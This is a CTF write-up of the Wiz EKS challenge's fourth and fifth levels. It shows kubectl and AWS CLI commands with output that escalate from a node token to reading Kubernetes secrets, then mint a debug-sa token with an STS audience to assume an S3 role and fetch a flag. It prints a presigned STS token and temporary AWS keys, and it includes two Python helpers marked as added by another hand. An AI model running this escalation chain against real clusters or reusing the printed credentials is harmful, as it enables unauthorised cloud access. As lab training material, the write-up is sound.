https://sts.us-west-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA2AVYNEVMXLIRZODD%2F20231106%2Fus-west-1%2Fsts%2Faws4_request&X-Amz-Date=20231106T075704Z&X-Amz-Expires=60&X-Amz-SignedHeaders=host%3Bx-k8s-aws-id&X-Amz-Security-Token=FwoGZXIvYXdzEGEaDGuJvGdAwTOlIl%2FbQyK3AZB5wA7Hg4T3jfLQE8RoHEl6JyCQKX0qg%2B6iaWwqdKdlQdY9h0yQZUWLolOv2Xr8tJdS%2FWnJQi6VoYewrdzwG7tz6J8ilJXQDxf%2BygFBmfP3K9jcrU8CNHXDMm51Xm3AM1OFHJRyaaovRSHbPaZtZzUojuM7Upnc%2F9yK%2BTEOc%2Fbz9ERp9IByywPuVf00tWEZVYOjjf1dZOPACHUHeEhp8RCIQvnub2fLPjpAx79umc6xxhE0ti7cBSi3sKKqBjItr5%2Be3bniDKGxKQUL3Fcq2Lmg1bvVaAJQaX%2FWRHFTry%2FcmMRCNQth%2F5V4PGl%2B&X-Amz-Signature=a257ce5d5bbf32b4e4dcfbee2b7dc6554c328c46d4f95c25ea4f290fdd357c99
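As an added example (not from the original post), the following Python decodes a k8s-aws-v1 token the way the pipeline above does and then pulls out the fields worth checking when such a token shows up in logs: the STS host, the access key id and region from X-Amz-Credential, the signing time and expiry, and whether the x-k8s-aws-id header (the cluster name) is covered by the signature. The sample token is constructed with a fake key id, session token and signature.

```python
import base64
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

TOKEN_PREFIX = "k8s-aws-v1."


def decode_eks_token(token: str) -> dict:
    """Parse a k8s-aws-v1 token into the fields an API-server authenticator checks.

    The body is a presigned STS GetCallerIdentity URL, base64url-encoded without
    padding; the cluster name itself is not in the URL, only the fact that the
    x-k8s-aws-id header was signed, so a token is bound to one cluster name.
    """
    if not token.startswith(TOKEN_PREFIX):
        raise ValueError("not a k8s-aws-v1 token")
    body = token[len(TOKEN_PREFIX):]
    url = base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)).decode()
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}

    if parts.scheme != "https" or not (parts.hostname or "").startswith("sts."):
        raise ValueError("presigned URL must point at an STS endpoint")
    if query.get("Action") != "GetCallerIdentity":
        raise ValueError("presigned URL must be a GetCallerIdentity call")
    signed_headers = query.get("X-Amz-SignedHeaders", "").split(";")
    if "x-k8s-aws-id" not in signed_headers:
        raise ValueError("cluster id header is not covered by the signature")

    # X-Amz-Credential is ACCESSKEYID/YYYYMMDD/REGION/sts/aws4_request
    credential = query["X-Amz-Credential"].split("/")
    signed_at = datetime.strptime(query["X-Amz-Date"], "%Y%m%dT%H%M%SZ").replace(
        tzinfo=timezone.utc
    )
    return {
        "sts_host": parts.hostname,
        "access_key_id": credential[0],
        "region": credential[2],
        "signed_at": signed_at,
        "expires_at": signed_at + timedelta(seconds=int(query["X-Amz-Expires"])),
        "signed_headers": signed_headers,
        "has_session_token": "X-Amz-Security-Token" in query,
    }


def build_demo_token() -> str:
    """Constructed sample token (fake key id, session token and signature) in the page's layout."""
    url = (
        "https://sts.us-west-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15"
        "&X-Amz-Algorithm=AWS4-HMAC-SHA256"
        "&X-Amz-Credential=ASIAEXAMPLEKEYID%2F20231106%2Fus-west-1%2Fsts%2Faws4_request"
        "&X-Amz-Date=20231106T075704Z&X-Amz-Expires=60"
        "&X-Amz-SignedHeaders=host%3Bx-k8s-aws-id"
        "&X-Amz-Security-Token=EXAMPLESESSIONTOKEN"
        "&X-Amz-Signature=" + "0" * 64
    )
    return TOKEN_PREFIX + base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")
```

An ASIA-prefixed key id together with a session token, as here, tells a reviewer the token was minted from temporary credentials such as a node instance role, which is exactly the path this challenge takes.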

Following the related information in this blog post, we tried to create a new kubeconfig, but it failed because of the certificate:

#!/bin/bash
read -r -d '' KUBECONFIG <<EOF
apiVersion: v1
clusters:
- cluster:
    certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
    server: https://688655246681.dkr.ecr.us-west-1.amazonaws.com
  name: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
contexts:
- context:
    cluster: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
    user: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
  name: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
current-context: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
kind: Config
preferences: {}
users:
- name: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: aws
      args:
      - eks
      - get-token
      - --region
      - us-west-1
      - --cluster-name
      - eks-challenge-cluster
      # - "-r"
      # - "arn:aws:iam::$account_id:role/my-role"
      # env:
      #   - name: "AWS_PROFILE"
      #     value: "aws-profile"
EOF
echo "${KUBECONFIG}" > ~/.kube/config

The error message:

root@wiz-eks-challenge:~# kubectl auth can-i --list 
Unable to connect to the server: x509: certificate signed by unknown authority

We failed to get the certificate data manually:

root@wiz-eks-challenge:~# aws eks describe-cluster --region us-west-1 --name eks-challenge-cluser --query "cluster.certificateAuthority.data" --output text

An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/eks-challenge-cluser

At that point we needed another approach. kubectl can take the token directly with --token, so let’s see what that gives us:

root@wiz-eks-challenge:~# kubectl --token $(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token') auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]

Great, this token has more permissions: we can list pods, secrets and service accounts. Let’s check the secrets:

root@wiz-eks-challenge:~# kubectl --token $(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token') get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T12:27:57Z"
    name: node-flag
    namespace: challenge4
    resourceVersion: "883574"
    uid: 26461a29-ec72-40e1-adc7-99128ce664f7
  type: Opaque
kind: List
metadata:
  resourceVersion: ""

We can see the encoded flag; let’s decode it:

root@wiz-eks-challenge:~# kubectl --token $(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token') get secrets -o json | jq -r '.items[].data.flag' | base64 -d
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}

5 — Pod Break

We start by reviewing the given data.

IAM Policy:

{
  "Policy": {
    "Statement": [
      {
        "Action": [
          "s3:GetObject",
          "s3:ListBucket"
        ],
        "Effect": "Allow",
        "Resource": [
          "arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
          "arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
        ]
      }
    ],
    "Version": "2012-10-17"
  }
}

Trust Policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}

Permissions:

{
  "secrets": [
    "get",
    "list"
  ],
  "serviceaccounts": [
    "get",
    "list"
  ],
  "pods": [
    "get",
    "list"
  ],
  "serviceaccounts/token": [
    "create"
  ]
}

We can see what exact permissions we have:

root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]

We checked what these permissions give us:

root@wiz-eks-challenge:~# kubectl get secrets
No resources found in challenge5 namespace.
root@wiz-eks-challenge:~# kubectl get secrets --all-namespaces
Error from server (Forbidden): secrets is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot list resource "secrets" in API group "" at the cluster scope

root@wiz-eks-challenge:~# kubectl get pods
No resources found in challenge5 namespace.
root@wiz-eks-challenge:~# kubectl get pods --all-namespaces
Error from server (Forbidden): pods is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot list resource "pods" in API group "" at the cluster scope

root@wiz-eks-challenge:~# kubectl get serviceaccounts
NAME          SECRETS   AGE
debug-sa      0         5d19h
default       0         5d19h
s3access-sa   0         5d19h

root@wiz-eks-challenge:~# kubectl get serviceaccounts -o yaml
apiVersion: v1
items:
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      description: This is a dummy service account with empty policy attached
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
    creationTimestamp: "2023-10-31T20:07:37Z"
    name: debug-sa
    namespace: challenge5
    resourceVersion: "671929"
    uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    creationTimestamp: "2023-10-31T20:07:11Z"
    name: default
    namespace: challenge5
    resourceVersion: "671804"
    uid: 77bd3db6-3642-40d5-b8c1-14fa1b0cba8c
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
    creationTimestamp: "2023-10-31T20:07:34Z"
    name: s3access-sa
    namespace: challenge5
    resourceVersion: "671916"
    uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
kind: List
metadata:
  resourceVersion: ""

We have three service accounts, but apart from that nothing interesting. We also have permission to create a token for the debug-sa service account:

root@wiz-eks-challenge:~# TOKEN=$(kubectl create token debug-sa)
root@wiz-eks-challenge:~# echo $TOKEN
eyJhbGciOiJSUzI1NiIsImtpZCI6IjZkMjNjYTkwMGI2MTVhYWJmNTBmYWJlZDc0NzA1OTNiNjIyMDA5NmYifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTY5OTI5MTQxNywiaWF0IjoxNjk5Mjg3ODE3LCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJjaGFsbGVuZ2U1Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlYnVnLXNhIiwidWlkIjoiNmNiNjAyNGEtYzRkYS00N2E5LTkwNTAtNTljOGM3MDc5OTA0In19LCJuYmYiOjE2OTkyODc4MTcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjaGFsbGVuZ2U1OmRlYnVnLXNhIn0.wCZ8nYeaUXqAbiyWHoofANqxBVWe5wc8rZMIbmg1coseG6EpGc0MR3fHJZRlfu5Ch8_iGXqiBNC0_yAwzTRdPvM4zZMS1fzVHWtOHNVFd2spiFRPXQxAXJRPxiGxOEkPGwYqpPdMJ5_FzcI8zK_TnuJkzNdeCoXfeIDDT2MHznnsSYspJNXB252q1Y4CfLy-0Db_z6gaSsOfkrbRg1URjPb4da-iYnsc7ca5ea3JVbskJSbIMXa7uweimbbo6ivpuDwz7tDd-fMyGR7eTDThqyn7WIrbs0MhBvtmhf3y0_9SF7bKIqvXuR-WfvkGzso2DiEvYN44eq-xKRYDMwRu_A
root@wiz-eks-challenge:~# echo $TOKEN > mytoken

By itself it doesn’t help us, because this token has fewer permissions than our current identity:

root@wiz-eks-challenge:~# kubectl --token $TOKEN auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]

It’s time to try other directions, and in the AWS documentation we read about sts:AssumeRoleWithWebIdentity:

This permission grants permission to obtain a set of temporary security credentials for users who have been authenticated in a mobile, web application, EKS… with a web identity provider

We tried the suggested assume-role call, but it didn’t help:

# Arn of debug-sa with the created token
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e --role-session-name something --web-identity-token ./mytoken


An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: The ID Token provided is not a valid JWT. (You may see this error if you sent an Access Token)

# Arn of s3access-sa with the default token
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token /var/run/secrets/kubernetes.io/serviceaccount/token

An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: The ID Token provided is not a valid JWT. (You may see this error if you sent an Access Token)

Both attempts failed, and the wording of the error is a hint: --web-identity-token expects the token string itself, and the AWS CLI only reads a file when the value is prefixed with file://, so STS received the literal path, which is indeed not a JWT. Still, thinking about it, it’s odd that we have permission to create a token for a service account we don’t need (debug-sa) when the one we need is s3access-sa. Assuming the role meant for s3access-sa, but with the token we created for debug-sa, gave a different error:

# Arn of s3access-sa with debug-sa token
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token $TOKEN

An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: Incorrect token audience

The error is about the token audience. First, we need to understand what an audience is, according to the Kubernetes documentation:

Audiences is a list of the identifiers that the resource server presented with the token identifies as. Audience-aware token authenticators will verify that the token was intended for at least one of the audiences in this list. If no audiences are provided, the audience will default to the audience of the Kubernetes apiserver.

It specifies the intended recipient of the token. By default it is the Kubernetes API server’s identifier. We can check the current audience by decoding the token’s payload (it is base64url-encoded JSON) and see that it is https://kubernetes.default.svc:

{
"aud": [
"https://kubernetes.default.svc"
],
"exp": 1699291417,
"iat": 1699287817,
"iss": "https://oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
"kubernetes.io": {
"namespace": "challenge5",
"serviceaccount": {
"name": "debug-sa",
"uid": "6cb6024a-c4da-47a9-9050-59c8c7079904"
}
},
"nbf": 1699287817,
"sub": "system:serviceaccount:challenge5:debug-sa"
}

We need to find the correct audience, and we already have it: recall the trust policy, where one of the condition keys names the audience the role expects:

"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}

So the audience must be sts.amazonaws.com. The kubectl create token command has an optional switch for setting the audience:

--audience=[]:
Audience of the requested token. If unset, defaults to requesting a token for use with the Kubernetes API
server. May be repeated to request a token valid for multiple audiences.
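To make the audience and subject checks concrete, here is a small Python script, added to this write-up and not part of the original post or of the CTF, that decodes a service account JWT the way we did by hand and evaluates it against an IAM role trust policy the way STS does for AssumeRoleWithWebIdentity. The issuer, account ID and service account names are the ones from this challenge; the tokens are constructed and unsigned, the trust policies are modelled on the StringEquals fragment quoted above (the full policy of challengeEksS3Role is not shown in this post), and the hardened variant with a :sub condition is our assumption of what a safe policy looks like. The returned error strings mirror the ones STS prints.

```python
import base64
import json

# Identifiers copied from the write-up above; everything else in this file is constructed.
ISSUER = "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
PROVIDER_ARN = f"arn:aws:iam::688655246681:oidc-provider/{ISSUER}"

def _b64url_decode(segment: str) -> bytes:
    # JWT segments are unpadded base64url; restore the padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def _b64url_encode(obj: dict) -> str:
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")

def decode_jwt_claims(token: str) -> dict:
    """Payload of a compact JWT, signature NOT verified: fine for inspecting
    aud/iss/sub as done by hand above, never for an authorization decision."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))

def sa_claims(name: str, audience: str) -> dict:
    """Claims shaped like the projected token that kubectl create token returned."""
    return {
        "aud": [audience],
        "iss": f"https://{ISSUER}",
        "kubernetes.io": {"namespace": "challenge5", "serviceaccount": {"name": name}},
        "sub": f"system:serviceaccount:challenge5:{name}",
    }

def make_unsigned_token(claims: dict) -> str:
    """Constructed alg=none token with an empty signature, for offline tests only;
    STS would reject it. It exists so trust_policy_allows() has realistic input."""
    return f"{_b64url_encode({'alg': 'none', 'typ': 'JWT'})}.{_b64url_encode(claims)}."

def trust_policy_allows(policy: dict, claims: dict) -> tuple[bool, str]:
    """Approximate STS's check of a role trust policy for AssumeRoleWithWebIdentity.
    Models Allow statements for our OIDC provider with StringEquals conditions on
    <issuer>:aud and <issuer>:sub (the usual IRSA shape); the first match decides."""
    if claims.get("iss") != f"https://{ISSUER}":
        return False, "Unknown issuer"
    aud = claims.get("aud", [])
    audiences = {aud} if isinstance(aud, str) else set(aud)
    for stmt in policy["Statement"]:
        if stmt.get("Effect") != "Allow" or stmt.get("Action") != "sts:AssumeRoleWithWebIdentity":
            continue
        if stmt.get("Principal", {}).get("Federated") != PROVIDER_ARN:
            continue
        conds = stmt.get("Condition", {}).get("StringEquals", {})
        wanted_aud = conds.get(f"{ISSUER}:aud")
        if wanted_aud is not None and wanted_aud not in audiences:
            return False, "Incorrect token audience"  # the STS error seen in the write-up
        wanted_sub = conds.get(f"{ISSUER}:sub")
        if wanted_sub is not None and wanted_sub != claims.get("sub"):
            return False, "Not authorized to perform sts:AssumeRoleWithWebIdentity"
        return True, "Allowed"
    return False, "No matching statement"

def _trust_policy(conditions: dict) -> dict:
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": PROVIDER_ARN},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringEquals": conditions},
    }]}

# Modelled on the fragment quoted above: only the audience is pinned, so any service
# account whose token we can mint with aud=sts.amazonaws.com (here debug-sa) gets the role.
AUDIENCE_ONLY_TRUST_POLICY = _trust_policy({f"{ISSUER}:aud": "sts.amazonaws.com"})

# Hardened variant (our assumption of what the role should carry): also pin the subject
# to the single service account that is meant to use the role.
PINNED_SUBJECT_TRUST_POLICY = _trust_policy({
    f"{ISSUER}:aud": "sts.amazonaws.com",
    f"{ISSUER}:sub": "system:serviceaccount:challenge5:s3access-sa",
})

def evaluate_scenarios() -> dict:
    """Replay the write-up's attempts (and the intended caller) against both policies."""
    tokens = {
        "debug-sa, k8s audience": sa_claims("debug-sa", "https://kubernetes.default.svc"),
        "debug-sa, sts audience": sa_claims("debug-sa", "sts.amazonaws.com"),
        "s3access-sa, sts audience": sa_claims("s3access-sa", "sts.amazonaws.com"),
    }
    policies = {"audience-only": AUDIENCE_ONLY_TRUST_POLICY, "pinned-subject": PINNED_SUBJECT_TRUST_POLICY}
    results = {}
    for policy_name, policy in policies.items():
        for token_name, claims in tokens.items():
            token = make_unsigned_token(claims)
            results[(policy_name, token_name)] = trust_policy_allows(policy, decode_jwt_claims(token))
    return results

if __name__ == "__main__":
    for (policy_name, token_name), (ok, why) in evaluate_scenarios().items():
        print(f"{policy_name:15} {token_name:26} -> {'ALLOW' if ok else 'DENY '} ({why})")
```

Running it prints one line per policy and token combination. The first row reproduces the "Incorrect token audience" error we hit with the default token, the second row is the successful path of this challenge, and the pinned-subject rows show that a :sub condition would have refused the debug-sa token even with the right audience. You can also paste the real token printed above into decode_jwt_claims to see the same claims we decoded by hand.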

We create the token again with the correct audience and assume the role:

root@wiz-eks-challenge:~#  TOKEN=$(kubectl create token debug-sa --audience sts.amazonaws.com)
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name something --web-identity-token $TOKEN
{
"Credentials": {
"AccessKeyId": "ASIA2AVYNEVMZAMFCQ6B",
"SecretAccessKey": "3bteSUtWee2pUNWwbqHrmTiACm9ynEp/6ZdUXlcj",
"SessionToken": "...",
"Expiration": "2023-11-06T18:00:39+00:00"
},
"SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
"AssumedRoleUser": {
"AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:something",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
},
"Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
"Audience": "sts.amazonaws.com"
}

Success! Note the SubjectFromWebIdentityToken: the role accepted a token for system:serviceaccount:challenge5:debug-sa, so its trust policy did not pin the subject to s3access-sa, and any service account whose token we can mint with the right audience can assume it. We can now use the AWS credentials, export them as environment variables and check the new caller identity:

export AWS_ACCESS_KEY_ID=ASIA2AVYNEVMZAMFCQ6B
export AWS_SECRET_ACCESS_KEY=3bteSUtWee2pUNWwbqHrmTiACm9ynEp/6ZdUXlcj
export AWS_SESSION_TOKEN=...

root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMZEZ2AFVYI:something",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
}

As we remember from the IAM role’s policy, we have these permissions on the bucket:

"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
]

We can use the AWS CLI to copy the flag object and read it:

root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag .
download: s3://challenge-flag-bucket-3ff1ae2/flag to ./flag
root@wiz-eks-challenge:~# cat flag
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}

Summary

I enjoyed solving this CTF and learned new things, and it didn’t require a hard setup because everything was already set up for you.
I hope to see more challenges like this.

Written by Eviatar Gerzi

Security researcher interested in reversing, solving CTFs, malware analysis, penetration testing and DevOps security (docker and Kubernetes)